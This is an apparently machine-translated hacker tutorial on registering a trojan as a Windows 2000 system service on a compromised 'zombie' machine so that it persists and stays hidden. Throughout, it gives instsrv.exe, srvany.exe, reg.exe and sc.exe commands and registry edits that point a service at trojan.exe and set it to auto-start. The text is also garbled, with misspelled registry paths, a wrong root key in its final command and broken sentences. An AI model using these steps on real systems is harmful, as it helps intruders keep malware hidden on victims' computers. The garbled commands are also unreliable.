How to register a trojan as a system service

Generally, the Trojan can be started in the following ways:
1. Start Group
2. autoexe. bat
3. Registry
4. win. ini
5. sysytem. ini
6. winstat. bat
7. *. inf
8. *. Autorun
So how can we register our horses as system services to enhance their concealment? The following are the implementation methods:
The tools we need have been provided by Microsoft in the Win2000 resouce kittool package. The tool named instsrv.exe srvany.exe reg.exe SC .exe also needs to be configured,
Let's call trojan.exe. Let's first Telnet the zombie and copy the tool to the System32 directory. Then we will start to work,

The command is instsrv.exe myservice srvany.exe.
In this way, a system service named myservice has been registered. The Registry is to be operated. We need to find the myservice we just added in heky_local_machine \ System \ CurrentControlSet \ Services,

Create a new key named parameters. Under parameters, create a new key named application and the type is REG_SZ,

The data value is c: \ winnt \ system32 \ trojan.exe.

So how can we implement the above operations? You can use either of the following methods to export heky_local_machine \ System \ currencontrolset \ Services-parameters to srv. Reg and upload them to the zombie,

Then run reg.exe/import srv. Reg. You can also use reg.exe to manually add other regions.

Reg.exe is used as follows:
F: \ tools \ nettools> Reg
Reg query /?
Reg Add /?
Reg delete /?
Reg copy /?
Reg save /?
Reg restore /?
Reg load /?
Reg unload /?
Reg compare /?
Reg export /?
Reg import /?

Rootkey [HKLM | hkcu | hkcr | HKU | HKCC]
Subkey the full name of a registry key under the selected rootkey
Valuename The Value Name, Under the selected key, to add
/Ve Add the empty value name <No Name>
Type [REG_SZ | reg_multi_sz | reg_dword_big_endian |
REG_DWORD | REG_BINARY | reg_dword_little_endian |
Reg_none | reg_expand_sz]
If omitted, REG_SZ is assumed
Separator specify one charactor that you use as the Separator in your data
String for reg_multi_sz. If omitted, use "\ 0" as the Separator
Data the data to assign to the Registry valuename being added
/F force overwriting the existing registry entry without prompt
Code 0, 1 indicates success, and 1 indicates failure :(.
The following is an example: Reg add HKLM \ SOFTWARE \ myco/V path/T reg_expand_sz/d % "systemroot" %
Adds a value (Name: path, type: reg_expand_sz, data: % SystemRoot %)
Notice: Put the double quote (") inside the expand string
According to this example, the command for the Service to be added should be: Reg add HKCC \ System \ CurrentControlSet \ Parameters/V myservice/T REG_SZ/d

C: \ winnt \ System32

Hey! After the migration, it becomes a service. Run trojan.exe next.

In addition, you can use SC .exeto create a congfigexample and configure myserviceas auto, SC .exe.

Even if you use a lot of resources, you may not need to talk nonsense.

^_^ With the self-protection of the horse, your horse will not become "immortal!

If you do not need to enable the 8 types of images to be started, the trojan.exe path will be deleted without being found.